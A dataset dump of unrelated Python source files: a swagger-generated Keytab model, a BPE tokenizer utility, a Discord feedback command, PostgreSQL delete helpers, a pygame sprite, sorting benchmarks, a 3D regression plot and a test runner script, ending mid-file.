Python SDK, developed by [Pure Storage, Inc](http://www.purestorage.com/). 
Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).\n\n OpenAPI spec version: 1.11\n Contact: info@purestorage.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass Keytab(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'id': 'str',\n 'name': 'str',\n 'encryption_type': 'str',\n 'fqdn': 'str',\n 'kvno': 'int',\n 'prefix': 'str',\n 'principal': 'str',\n 'realm': 'str',\n 'suffix': 'int'\n }\n\n attribute_map = {\n 'id': 'id',\n 'name': 'name',\n 'encryption_type': 'encryption_type',\n 'fqdn': 'fqdn',\n 'kvno': 'kvno',\n 'prefix': 'prefix',\n 'principal': 'principal',\n 'realm': 'realm',\n 'suffix': 'suffix'\n }\n\n def __init__(self, id=None, name=None, encryption_type=None, fqdn=None, kvno=None, prefix=None, principal=None, realm=None, suffix=None):\n \"\"\"\n Keytab - a model defined in Swagger\n \"\"\"\n\n self._id = None\n self._name = None\n self._encryption_type = None\n self._fqdn = None\n self._kvno = None\n self._prefix = None\n self._principal = None\n self._realm = None\n self._suffix = None\n\n if id is not None:\n self.id = id\n if name is not None:\n self.name = name\n if encryption_type is not None:\n self.encryption_type = encryption_type\n if fqdn is not None:\n self.fqdn = fqdn\n if kvno is not None:\n self.kvno = kvno\n if prefix is not None:\n self.prefix = prefix\n if principal is not None:\n self.principal = principal\n if realm is not None:\n self.realm = realm\n if suffix is not None:\n self.suffix = suffix\n\n @property\n def id(self):\n \"\"\"\n Gets the id of this Keytab.\n A non-modifiable, globally unique ID chosen by the system.\n\n :return: The id of this Keytab.\n :rtype: str\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"\n Sets the id of this Keytab.\n A non-modifiable, globally unique ID chosen by the system.\n\n :param id: The id of this Keytab.\n :type: str\n \"\"\"\n\n self._id = id\n\n @property\n def name(self):\n \"\"\"\n Gets the name of this Keytab.\n The name of the object (e.g., a file system or snapshot).\n\n :return: The name of this Keytab.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"\n Sets the name of this Keytab.\n The name of the object (e.g., a file system or snapshot).\n\n :param name: The name of this Keytab.\n :type: str\n \"\"\"\n\n self._name = name\n\n @property\n def encryption_type(self):\n \"\"\"\n Gets the encryption_type of this Keytab.\n The encryption type used by the kerberos domain controller to generate the keytab.\n\n :return: The encryption_type of this Keytab.\n :rtype: str\n \"\"\"\n return self._encryption_type\n\n @encryption_type.setter\n def encryption_type(self, encryption_type):\n \"\"\"\n Sets the encryption_type of this Keytab.\n The encryption type used by the kerberos domain controller to generate the keytab.\n\n :param encryption_type: The encryption_type of this Keytab.\n :type: str\n \"\"\"\n\n self._encryption_type = encryption_type\n\n @property\n def fqdn(self):\n \"\"\"\n Gets the fqdn of this Keytab.\n The fully qualified domain name to which the keytab was issued.\n\n 
:return: The fqdn of this Keytab.\n :rtype: str\n \"\"\"\n return self._fqdn\n\n @fqdn.setter\n def fqdn(self, fqdn):\n \"\"\"\n Sets the fqdn of this Keytab.\n The fully qualified domain name to which the keytab was issued.\n\n :param fqdn: The fqdn of this Keytab.\n :type: str\n \"\"\"\n\n self._fqdn = fqdn\n\n @property\n def kvno(self):\n \"\"\"\n Gets the kvno of this Keytab.\n The key version number of the key used to generate the keytab.\n\n :return: The kvno of this Keytab.\n :rtype: int\n \"\"\"\n return self._kvno\n\n @kvno.setter\n def kvno(self, kvno):\n \"\"\"\n Sets the kvno of this Keytab.\n The key version number of the key used to generate the keytab.\n\n :param kvno: The kvno of this Keytab.\n :type: int\n \"\"\"\n\n self._kvno = kvno\n\n @property\n def prefix(self):\n \"\"\"\n Gets the prefix of this Keytab.\n The prefix in the name of the keytab object. This is the same for all keytab objects created from a single keytab file. The name of a keytab entry is created in the format `<prefix>.<suffix>` for all entries.\n\n :return: The prefix of this Keytab.\n :rtype: str\n \"\"\"\n return self._prefix\n\n @prefix.setter\n def prefix(self, prefix):\n \"\"\"\n Sets the prefix of this Keytab.\n The prefix in the name of the keytab object. This is the same for all keytab objects created from a single keytab file. The name of a keytab entry is created in the format `<prefix>.<suffix>` for all entries.\n\n :param prefix: The prefix of this Keytab.\n :type: str\n \"\"\"\n\n self._prefix = prefix\n\n @property\n def principal(self):\n \"\"\"\n Gets the principal of this Keytab.\n The service name for which the keytab was issued.\n\n :return: The principal of this Keytab.\n :rtype: str\n \"\"\"\n return self._principal\n\n @principal.setter\n def principal(self, principal):\n \"\"\"\n Sets the principal of this Keytab.\n The service name for which the keytab was issued.\n\n :param principal: The principal of this Keytab.\n :type: str\n \"\"\"\n\n self._principal = principal\n\n @property\n def realm(self):\n \"\"\"\n Gets the realm of this Keytab.\n The kerberos realm that issued the keytab.\n\n :return: The realm of this Keytab.\n :rtype: str\n \"\"\"\n return self._realm\n\n @realm.setter\n def realm(self, realm):\n \"\"\"\n Sets the realm of this Keytab.\n The kerberos realm that issued the keytab.\n\n :param realm: The realm of this Keytab.\n :type: str\n \"\"\"\n\n self._realm = realm\n\n @property\n def suffix(self):\n \"\"\"\n Gets the suffix of this Keytab.\n The suffix in the name of the keytab object, determined at creation time using the slot number of the keytab entry in a file and the number of existing entries with the same prefix. The name of a keytab entry is created in the format `<prefix>.<suffix>` for all entries.\n\n :return: The suffix of this Keytab.\n :rtype: int\n \"\"\"\n return self._suffix\n\n @suffix.setter\n def suffix(self, suffix):\n \"\"\"\n Sets the suffix of this Keytab.\n The suffix in the name of the keytab object, determined at creation time using the slot number of the keytab entry in a file and the number of existing entries with the same prefix. 
The name of a keytab entry is created in the format `<prefix>.<suffix>` for all entries.\n\n :param suffix: The suffix of this Keytab.\n :type: int\n \"\"\"\n\n self._suffix = suffix\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n if not isinstance(other, Keytab):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n","sub_path":"purity_fb/purity_fb_1dot11/models/keytab.py","file_name":"keytab.py","file_ext":"py","file_size_in_byte":9552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"98827458","text":"\"\"\"Implementation of (byte-level) bpe.\n\nThe tokenizer splits by spaces to construct a vocabulary. All words then use space\nas an end of word symbol. All words are encoded to bytes via utf-8, after which\nbpe can be applied.\n\nThe implementation uses a cache for blocks of words to quickly filter out blocks\nwithout specific pairs.\n\nvocab - during compression, refers to list of (word, count)\nword - during compression, this is a tuple of ids\nbase_vocab - this is a list of byte strings, the index is the id\npairs - during compression, pair -> count\ncache - during compression, list of pair -> count for each block\n\nAuthor:\n Jeffrey Shen\n\"\"\"\n\nimport collections\nimport copy\nimport heapq\nfrom tqdm import tqdm\n\nclass TopCounter:\n \"\"\"Counter, but O(log n)ish to get the top element\"\"\"\n\n def __init__(self):\n self.counter = collections.Counter()\n self.heap = []\n\n def update(self, counter):\n self.counter.update(counter)\n for k in counter:\n if k in self.counter and self.counter[k] == 0:\n del self.counter[k]\n\n if k in self.counter:\n heapq.heappush(self.heap, (-self.counter[k], k))\n \n \n def subtract(self, counter):\n self.counter.subtract(counter)\n for k in counter:\n if k in self.counter and self.counter[k] == 0:\n del self.counter[k]\n\n if k in self.counter:\n heapq.heappush(self.heap, (-self.counter[k], k))\n\n def __len__(self):\n return len(self.counter)\n\n def pop(self):\n while len(self.heap) > 0:\n count, k = heapq.heappop(self.heap)\n count = -count\n if k not in self.counter:\n continue\n\n if self.counter[k] == 0:\n raise RuntimeError(\"Wtf! 
Invariant violated\")\n\n # Make sure still valid\n if self.counter[k] != count:\n continue\n\n return k, count\n\n return None, None\n \n \n\ndef get_vocab_from_dict(lines, tokenizer):\n \"\"\"Gets a vocab from a dict of lines to their count.\n\n Returns:\n vocab (list): (word as a tuple of int, count), sorted descending by count\n \"\"\"\n vocab = collections.Counter()\n\n for line, count in lines.items():\n words = tokenizer.tokenize(line)\n for word in words:\n vocab[word] += count\n\n vocab = list(vocab.items())\n vocab.sort(key=lambda k: k[1], reverse=True)\n return vocab\n\n\ndef get_stats(vocab, l1_block_size, l2_block_size):\n pairs = TopCounter()\n l1 = []\n l2 = []\n for ind, (word, count) in enumerate(vocab):\n if ind % l1_block_size == 0:\n l1.append(collections.Counter())\n if ind % l2_block_size == 0:\n l2.append(collections.Counter())\n add_stats_for_word(word, count, l1[-1])\n add_stats_for_word(word, count, l2[-1])\n for block in l1:\n pairs.update(block)\n return pairs, l1, l2\n\n\ndef add_stats_for_word(word, count, counter):\n for i in range(len(word) - 1):\n counter[word[i], word[i + 1]] += count\n\n\ndef contains_pair(word, pair):\n for i in range(len(word) - 1):\n if (word[i], word[i + 1]) == pair:\n return True\n return False\n\n\ndef replace_pair(word, pair, num):\n next = []\n for i in range(len(word)):\n next.append(word[i])\n if len(next) < 2:\n continue\n if (next[-2], next[-1]) == pair:\n next.pop()\n next[-1] = num\n return tuple(next)\n\n\ndef subtract_counters(counter_a, counter_b):\n counter_a.subtract(counter_b)\n for k in counter_b:\n if k in counter_a and counter_a[k] == 0:\n del counter_a[k]\n\n\ndef merge_vocab(vocab, best, num, pairs, l1, l2, l1_bs, l2_bs):\n hit1 = 0\n miss1 = 0\n hit2 = 0\n miss2 = 0\n for i in range(0, len(vocab), l2_bs):\n c2 = l2[i // l2_bs]\n hit2 += 1\n if best not in c2:\n continue\n if c2[best] == 0:\n continue\n\n hit2 -= 1\n miss2 += 1\n\n for j in range(i, min(len(vocab), i + l2_bs), l1_bs):\n c1 = l1[j // l1_bs]\n hit1 += 1\n if best not in c1:\n continue\n if c1[best] == 0:\n continue\n hit1 -= 1\n miss1 += 1\n\n for v in range(j, min(len(vocab), j + l1_bs), 1):\n word, count = vocab[v]\n\n if not contains_pair(word, best):\n continue\n\n diff = collections.Counter()\n add_stats_for_word(word, count, diff)\n next = replace_pair(word, best, num)\n sub = collections.Counter()\n add_stats_for_word(next, count, sub)\n subtract_counters(diff, sub)\n subtract_counters(c1, diff)\n subtract_counters(c2, diff)\n pairs.subtract(diff)\n\n vocab[v] = (next, count)\n\n return hit1, miss1, hit2, miss2\n\n\ndef learn_bpe(vocab, max_length, base_vocab, l1_bs=16, l2_bs=256):\n \"\"\"Performs bpe and returns the merge list.\n\n Returns:\n merges (list): (id pair, id result, count)\n vocab (list): (encoded word, count)\n \"\"\"\n vocab = copy.deepcopy(vocab)\n last = len(base_vocab)\n merges = []\n pairs, l1, l2 = get_stats(vocab, l1_bs, l2_bs)\n\n with tqdm(range(last, max_length)) as pbar:\n for i in pbar:\n if len(pairs) == 0:\n break\n best, count = pairs.pop()\n if best == None:\n raise RuntimeError(\"Never should happen!\")\n\n merges.append((best, i, count))\n hit1, miss1, hit2, miss2 = merge_vocab(\n vocab, best, i, pairs, l1, l2, l1_bs, l2_bs\n )\n pbar.set_postfix(\n {\n \"hit2\": hit2,\n \"miss2\": miss2,\n \"hit1\": hit1,\n \"miss1\": miss1,\n \"pairs\": len(pairs),\n }\n )\n\n return merges, 
vocab","sub_path":"preprocess/bpe_utils.py","file_name":"bpe_utils.py","file_ext":"py","file_size_in_byte":6067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"116141059","text":"import discord\nfrom Core.Fonctions.Embeds import exeErrorExcept,embedAssert\n\n\nasync def exeFeedback(ctx,bot,args):\n \"\"\"This function sends a message to OlborEgamorf to give feedback about the bot.\n \n The command takes a comment sentence as its argument.\n \n The sentence is then sent to a private channel on the bot's test server.\"\"\"\n try:\n assert len(args)>0, \"Votre message est vide !\"\n phrase=\"\"\n for i in args:\n phrase+=\" \"+i\n embedTable=discord.Embed(title=\"<:otVERT:868535645897912330> Message envoyé :\", description=phrase, color=0x339966)\n embedTable.set_footer(text=\"OT!feedback - {0} - {1}\".format(ctx.author.name,ctx.author.id))\n await bot.get_channel(737041049939345408).send(embed=embedTable)\n except AssertionError as er:\n embedTable=embedAssert(str(er))\n except:\n embedTable=await exeErrorExcept(ctx,bot,args)\n await ctx.send(embed=embedTable)\n return","sub_path":"Autre/Feedback.py","file_name":"Feedback.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"405996959","text":"# Pedro Furtado (pnf@dei.uc.pt), Bases de Dados 2018/2019, \n# based on the example at\n# http://www.postgresqltutorial.com/postgresql-python\n\nimport psycopg2\nimport sys\n\n#======================= delete tables with one primary key ===============================\ndef delete_1key(aux,myid):\n\n if aux == 'banda':\n commands = (\n \"\"\" DELETE FROM banda where idbanda=%s\"\"\"\n\t\t )\n elif aux == 'album':\n commands = (\n \"\"\" DELETE FROM album where idalbum=%s\"\"\"\n\t\t )\n elif aux == 'musica':\n commands = (\n \"\"\" DELETE FROM musica where idmusica=%s\"\"\"\n\t\t )\n elif aux == 'compositor':\n commands = (\n \"\"\" DELETE FROM compositor where idcompositor=%s\"\"\"\n\t\t )\n elif aux == 'membro':\n commands = (\n \"\"\" DELETE FROM membro where idmembro=%s\"\"\"\n\t\t )\n elif aux == 'playlist':\n commands = (\n \"\"\" DELETE FROM playlist where idplaylist=%s\"\"\"\n\t\t )\n elif aux == 'utilizador':\n commands = (\n \"\"\" DELETE FROM utilizador where username=%s\"\"\"\n\t\t )\n try:\n\n conn = psycopg2.connect(host=\"localhost\",database=\"Projeto\", user=\"postgres\", password=\"postgres\")\n cur = conn.cursor()\n cur.execute(commands, (myid,))\n # close communication with the PostgreSQL database server\n cur.close()\n # commit the changes\n conn.commit()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n \n#======================= delete tables with two primary keys ===============================\ndef delete_2key(aux,myid1,myid2):\n\n if aux == 'concertos':\n commands = (\n \"\"\" DELETE FROM concertos where idbanda=%s and datahora=%s\"\"\"\n\t\t )\n elif aux == 'critalbum':\n commands = (\n \"\"\" DELETE FROM critalbum where username=%s and idalbum=%s\"\"\"\n\t\t )\n elif aux == 'critmusica':\n commands = (\n \"\"\" DELETE FROM critmusica where username=%s and idmusica=%s\"\"\"\n\t\t )\n elif aux == 'critbanda':\n commands = (\n \"\"\" DELETE FROM critbanda where username=%s and idbanda=%s\"\"\"\n\t\t )\n elif aux == 'genero':\n commands = (\n \"\"\" DELETE FROM genero where idmusica=%s and nome_genero=%s\"\"\"\n\t\t )\n 
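# the remaining branches handle link tables whose rows are identified by a pair of foreign keys\n 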
elif aux == 'membro_banda':\n commands = (\n \"\"\" DELETE FROM membro_banda where idmembro=%s and idbanda=%s\"\"\"\n\t\t )\n elif aux == 'compositor_musica':\n commands = (\n \"\"\" DELETE FROM compositor_musica where idcompositor=%s and idmusica=%s\"\"\"\n\t\t )\n elif aux == 'compositor_membro':\n commands = (\n \"\"\" DELETE FROM compositor_membro where idcompositor=%s and idmembro=%s\"\"\"\n\t\t )\n elif aux == 'playlist_musica':\n commands = (\n \"\"\" DELETE FROM playlist_musica where idmusica=%s and idplaylist=%s\"\"\"\n\t\t )\n elif aux == 'ficheiros':\n commands = (\n \"\"\" DELETE FROM ficheiros where idmusica=%s and username=%s\"\"\"\n\t\t )\n try:\n\n conn = psycopg2.connect(host=\"localhost\",database=\"Projeto\", user=\"postgres\", password=\"postgres\")\n cur = conn.cursor()\n cur.execute(commands, (myid1,myid2,))\n # close communication with the PostgreSQL database server\n cur.close()\n # commit the changes\n conn.commit()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n","sub_path":"delete_values.py","file_name":"delete_values.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"285140503","text":"__author__ = 'Kirill Korovin'\n\nimport pygame\nimport random\n\n\nclass Fish(pygame.sprite.Sprite):\n\n def __init__(self, *groups):\n super(Fish, self).__init__(*groups)\n self.direction = 1\n self.image = pygame.image.load('images/fish.png')\n self.image = pygame.transform.flip(self.image, False, True)\n self.rect = pygame.Rect((random.randrange(10, 430, 10), 600), self.image.get_size())\n self.flag = True\n\n def update(self, dt):\n if self.rect.y > random.randrange(20,360,20) and self.direction == 1:\n self.rect.y -= 300 * dt\n else:\n self.direction = 2\n if self.rect.y < 600 and self.direction == 2:\n self.image = pygame.image.load('images/fish.png')\n self.rect.y += 300 * dt\n else:\n self.direction = 3","sub_path":"fish.py","file_name":"fish.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"609912366","text":"#!/usr/bin/python\n\nimport random\nimport numpy as np\nfrom datetime import datetime \nimport time\nimport timeit\nimport matplotlib.pyplot as plt\nfrom insertionSort import insertionSort\nfrom mergeSort import mergeSort\nfrom heapSort import heapSort\nfrom quickSort import quickSort\nfrom modifiedQuickSort import modifiedQuickSort\n\n\ndef calculateAvg(func,execTime,INPUT_SIZE,sorting_type):\n\n FuncName = {\n 'insert':insertionSort,\n 'merge':mergeSort,\n 'heap':heapSort,\n 'quick':quickSort,\n 'modifiedQuick':modifiedQuickSort\n\n }\n #### Should be Taking average for 3 dataset\n Num_Of_Case = 1\n timeElapsed = 0\n sortingName = FuncName[func]\n #alg = FuncName.get(func,lambda:\"Invalid Function\")\n\n data_type = {\n 1: \"_sorted\",\n 2: \"_reverse\",\n 3: \"\"\n }\n\n for i in range(1,Num_Of_Case+1) :\n arr = []\n inputFile = open(\"DataSet/dataSet\" + str(i) + data_type.get(sorting_type) + \".txt\", \"r\")\n arr = np.loadtxt(inputFile,dtype=int,max_rows=INPUT_SIZE)\n #print(arr)\n inputFile.close()\n startTime = time.time()\n sortingName(arr,0,len(arr)-1)\n timeElapsed = timeElapsed + time.time()-startTime\n outputFile = open(\"Result/\"+func+\"_\"+str(INPUT_SIZE)+\"_\"+str(i)+\".txt\",\"w\")\n outputFile.writelines(\"%s\\n\" %item for item in arr)\n outputFile.close()\n timeElapsed = 
timeElapsed/Num_Of_Case\n execTime.append(timeElapsed)\n print('Time elapsed in execution of '+func+' : '+str(timeElapsed)+' seconds')\n\ndef main():\n\n # print(\"Select Sorting Algorithm to test :\")\n # print(\"1. Insertion Sort\")\n # print(\"2. Merge Sort\")\n # print(\"3. Heap Sort\")\n # print(\"4. In-Place Quick Sort\")\n # print(\"5. Modified Quick Sort\")\n # print(\"6. All Sorting Algorithms\")\n print(\"1. sorted\")\n print(\"2. reversely sorted\")\n print(\"3. Random inputs\")\n sorting_type = int(input(\"How do you want the inputs to be: \"))\n func = []\n # while len(func)==0 :\n # \talgorithm = input(\"Enter the Algorithm number :\")\n # \tif algorithm ==6 :\n # \t\tfunc = [item for item in range(1,7)]\n # \t\tbreak\n # \tif (algorithm>=1 or algorithm<=5) :\n # \t\tfunc.append(algorithm)\n # \t\tbreak\n # \tprint(\"Please Enter valid Input\")\n # print(\"selected:\",func)\n #\n\n size = [1000,2000,3000,4000,5000,10000,20000,30000,40000,50000]\n #size = [1000]\n #print(\"Random Generation of DATASET started\")\n\n #for num in range(1,4):\n #\tINPUT_SIZE = 50000\n #\tinputFile = open(\"DataSet/dataSet\"+str(num)+\".txt\",\"w\")\n #\tinputFile.writelines(\"%s\\n\" %random.randint(0,INPUT_SIZE) for x in range(0,INPUT_SIZE))\n #\tinputFile.close()\n\n print(\"Random Generation of DATASET Ended --\")\n\n insert = []\n merge = []\n heap = []\n quick = []\n modifiedQuick = []\n\n for num in size:\n print(\"\\n For input size of :\"+str(num))\n #\tcalculateAvg('insert',insert,num, sorting_type)\n calculateAvg('merge',merge,num, sorting_type)\n calculateAvg('heap',heap,num, sorting_type)\n calculateAvg('quick',quick,num, sorting_type)\n #\tcalculateAvg('modifiedQuick',modifiedQuick,num, sorting_type)\n\n print(insert)\n print(merge)\n print(heap)\n print(quick)\n print(modifiedQuick)\n\n #plt.plot(size, insert, label = \"Insertion Sort\")\n plt.plot(size, merge, label = \"Merge Sort\")\n plt.plot(size, heap, label = \"Heap Sort\")\n plt.plot(size, quick, label = \"Quick Sort\")\n #plt.plot(size, modifiedQuick, label = \"Modified Sort\")\n plt.xlabel('Input size')\n plt.ylabel('Time (seconds)')\n plt.title('Sorting algorithm running times')\n plt.legend()\n plt.show()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"603808151","text":"from QtCore import *\nfrom QtGui import *\n\nfrom gamebuttoncontrol import GameButtonControl\nfrom button import Button\n\nclass GameRoomControl(GameButtonControl):\n ANIMATION_SHOW_BACK_BUTTON_DURATION_PHASE_ONE = GameButtonControl.ANIMATION_SHOW_LEFT_BUTTON_DURATION_PHASE_ONE\n ANIMATION_SHOW_BACK_BUTTON_DURATION_PHASE_TWO = GameButtonControl.ANIMATION_SHOW_LEFT_BUTTON_DURATION_PHASE_TWO\n\n ANIMATION_SHOW_START_BUTTON_DURATION_PHASE_ONE = GameButtonControl.ANIMATION_SHOW_RIGHT_BUTTON_DURATION_PHASE_ONE\n ANIMATION_SHOW_START_BUTTON_DURATION_PHASE_TWO = GameButtonControl.ANIMATION_SHOW_RIGHT_BUTTON_DURATION_PHASE_TWO\n\n backButtonClicked = Signal()\n startButtonClicked = Signal()\n\n def __init__(self, parent):\n super(GameRoomControl, self).__init__(parent)\n self.backButton = Button('Back', False, True, False, self)\n self.startButton = Button('Start', False, True, False, self)\n\n self.backButton.resize(GameButtonControl.SIZE_BUTTON)\n self.startButton.resize(GameButtonControl.SIZE_BUTTON)\n\n self.backButton.move(GameButtonControl.POS_LEFT_BUTTON)\n 
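# the back button takes the shared left slot; the start button is placed in the right-hand slot below\n 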
self.startButton.move(GameButtonControl.POS_RIGHT_BUTTON_TWO)\n\n self.backButton.clicked.connect(self.backButtonClicked)\n self.startButton.clicked.connect(self.startButtonClicked)\n\n @Slot()\n def _startAnimation(self):\n self.backButton.hide()\n self.startButton.hide()\n\n # delay\n delayAnimation = QPauseAnimation()\n delayAnimation.setDuration(GameRoomControl.ANIMATION_INITIAL_DELAY)\n delayAnimation.finished.connect(self.backButton.show)\n delayAnimation.finished.connect(self.startButton.show)\n\n # back button\n showBackButtonAnimationGroup = self._showLeftButtonAnimation(self.backButton,\n GameRoomControl.ANIMATION_SHOW_BACK_BUTTON_DURATION_PHASE_ONE, \n GameRoomControl.ANIMATION_SHOW_BACK_BUTTON_DURATION_PHASE_TWO)\n\n # start button\n showStartButtonAnimationPhaseOne = QPropertyAnimation(self.startButton, 'pos')\n showStartButtonAnimationPhaseOne.setDuration(GameRoomControl.ANIMATION_SHOW_START_BUTTON_DURATION_PHASE_ONE)\n endPos = GameButtonControl.POS_RIGHT_BUTTON_TWO - QPoint(0, GameRoomControl.ANIMATION_BUTTON_DROP)\n startPos = QPoint(self.width(), endPos.y())\n showStartButtonAnimationPhaseOne.setStartValue(startPos)\n showStartButtonAnimationPhaseOne.setEndValue(endPos)\n showStartButtonAnimationPhaseOne.setEasingCurve(QEasingCurve.Linear)\n\n showStartButtonAnimationPhaseTwo = QPropertyAnimation(self.startButton, 'pos')\n showStartButtonAnimationPhaseTwo.setDuration(GameRoomControl.ANIMATION_SHOW_START_BUTTON_DURATION_PHASE_TWO)\n startPos = endPos\n endPos = GameButtonControl.POS_RIGHT_BUTTON_TWO\n showStartButtonAnimationPhaseTwo.setStartValue(startPos)\n showStartButtonAnimationPhaseTwo.setEndValue(endPos)\n showStartButtonAnimationPhaseTwo.setEasingCurve(QEasingCurve.Linear)\n\n showStartButtonAnimationGroup = QSequentialAnimationGroup()\n showStartButtonAnimationGroup.addAnimation(showStartButtonAnimationPhaseOne)\n showStartButtonAnimationGroup.addAnimation(showStartButtonAnimationPhaseTwo)\n\n # all buttons\n showButtonsAnimationGroup = QParallelAnimationGroup()\n showButtonsAnimationGroup.addAnimation(showBackButtonAnimationGroup)\n showButtonsAnimationGroup.addAnimation(showStartButtonAnimationGroup)\n\n self.showAnimationGroup = QSequentialAnimationGroup()\n self.showAnimationGroup.addAnimation(delayAnimation)\n self.showAnimationGroup.addAnimation(showButtonsAnimationGroup)\n self.showAnimationGroup.start(QAbstractAnimation.DeleteWhenStopped)\n\n","sub_path":"gui/gameroomcontrol.py","file_name":"gameroomcontrol.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"129222245","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import linear_model\r\nfrom sklearn.metrics import mean_absolute_error\r\n\r\n# data: dataframe\r\ndata = pd.read_csv('objectFile.csv')\r\n\r\n# divide each dimension's value\r\nXY = data[['Input', 'Output']].values.reshape(-1, 2)\r\nZ = data['Cost']\r\n\r\nx = XY[:, 0]\r\ny = XY[:, 1]\r\nz = Z\r\n\r\n# prepare data point for visualize model(2d)\r\nnum_point = 30\r\nx_range = np.arange(min(x), max(x), (max(x) - min(x))/num_point)\r\ny_range = np.arange(min(y), max(y), (max(y) - min(y))/num_point)\r\n\r\n# made 2d-grid, num of points is num_point * num_point\r\n# x_points, y_points are 2d-list\r\nx_points, y_points = np.meshgrid(x_range, y_range)\r\nmodel_viz = np.array([x_points.flatten(), y_points.flatten()]).T\r\n\r\n# train using sklearn's LinR model, using ols, ols: ordinary least 
squares,\r\nols = linear_model.LinearRegression()\r\nmodel = ols.fit(XY, Z)\r\npredicted = model.predict(model_viz)\r\n\r\n# evaluate model\r\nr2 = model.score(XY, Z)\r\n\r\nfig = plt.figure(figsize=(16, 5))\r\n\r\n# 1, 3, 1: add subplot between 1 and 3, on 1\r\nax1 = fig.add_subplot(1, 3, 1, projection='3d')\r\nax2 = fig.add_subplot(1, 3, 2, projection='3d')\r\nax3 = fig.add_subplot(1, 3, 3, projection='3d')\r\naxes = [ax1, ax2, ax3]\r\n\r\n# measure mean absolute error\r\nmae = mean_absolute_error(Z, model.predict(XY))\r\n\r\nfor ax in axes:\r\n # plot experimental data\r\n ax.plot(x, y, z, color='black', zorder=15, linestyle='none', marker='o', alpha=0.5)\r\n # plot model\r\n ax.scatter(x_points.flatten(), y_points.flatten(), predicted, color='white', s=20, edgecolor='#70b3f0')\r\n\r\n ax.set_xlabel('Input RDD (MB)', fontsize=12)\r\n ax.set_ylabel('Output RDD (MB)', fontsize=12)\r\n ax.set_zlabel('Cost (sec)', fontsize=12)\r\n\r\n\r\nax1.view_init(elev=28, azim=120)\r\nax2.view_init(elev=4, azim=114)\r\nax3.view_init(elev=60, azim=165)\r\n\r\neq_str = '$: %.8fX_i + %.8fX_o + %.8f$, ' % (model.coef_[0], model.coef_[1], model.intercept_)\r\nerr_str = '$R^2 = %.3f, MAE = $%.3f sec' % (r2, mae)\r\nfig.suptitle(eq_str + err_str, fontsize=15)\r\nfig.tight_layout()\r\n\r\nplt.show()\r\n","sub_path":"visualization_practice/3d_scatter/scatter.py","file_name":"scatter.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"353624510","text":"from datetime import datetime\nfrom os import path\nfrom subprocess import Popen, PIPE\nfrom sys import exit\n\nLOG_FILE = path.basename(__file__) + '.log'\n\n\ndef run(*args: str):\n print('cmd:', args)\n with open(LOG_FILE, 'a') as f1:\n f1.write('\\n' + str(args))\n\n p = Popen(args, shell=True, stdout=PIPE, stderr=PIPE)\n o, e = p.communicate()\n output = o.decode(\"utf-8\").replace('\\r', '')\n errs = e.decode(\"utf-8\").replace('\\r', '')\n\n with open(LOG_FILE, 'a') as f2:\n if len(output) > 0:\n f2.write('\\n' + output)\n print(output)\n if len(errs) > 0:\n f2.write('\\n' + 15 * 'ERR---' + '\\n' + errs)\n print(15 * 'ERR---', '\\n', errs)\n exit(1)\n\n\nif __name__ == '__main__':\n with open(LOG_FILE, 'w') as f:\n f.write(str(datetime.now()))\n run(r'..\\python-venv\\Scripts\\activate.bat')\n run('pytest', 'tests/')\n run(r'..\\python-venv\\Scripts\\deactivate.bat')\n print('done')\n","sub_path":"translator/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"570336339","text":"from typing import Dict, Any\n\nfrom qcodes.dataset.param_spec import ParamSpec\n\n\nclass InterDependencies:\n \"\"\"\n 